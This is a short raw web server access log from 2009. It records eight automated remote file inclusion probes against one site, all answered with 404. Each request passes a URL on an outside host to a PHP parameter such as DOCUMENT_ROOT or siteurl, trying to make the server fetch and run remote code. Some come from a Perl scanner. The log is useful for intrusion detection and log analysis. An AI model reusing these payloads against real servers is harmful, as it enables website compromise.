200.174.17.53 - - [16/Sep/2009:11:38:47 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:11:38:51 -0700] "GET /logs/access_080715.log///protection.php?action=logout&siteurl=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:11:38:51 -0700] "GET //protection.php?action=logout&siteurl=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:11:38:52 -0700] "GET /logs///protection.php?action=logout&siteurl=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:39:06 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:39:06 -0700] "GET /logs/access_080906.log%20%20//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:39:06 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:39:10 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
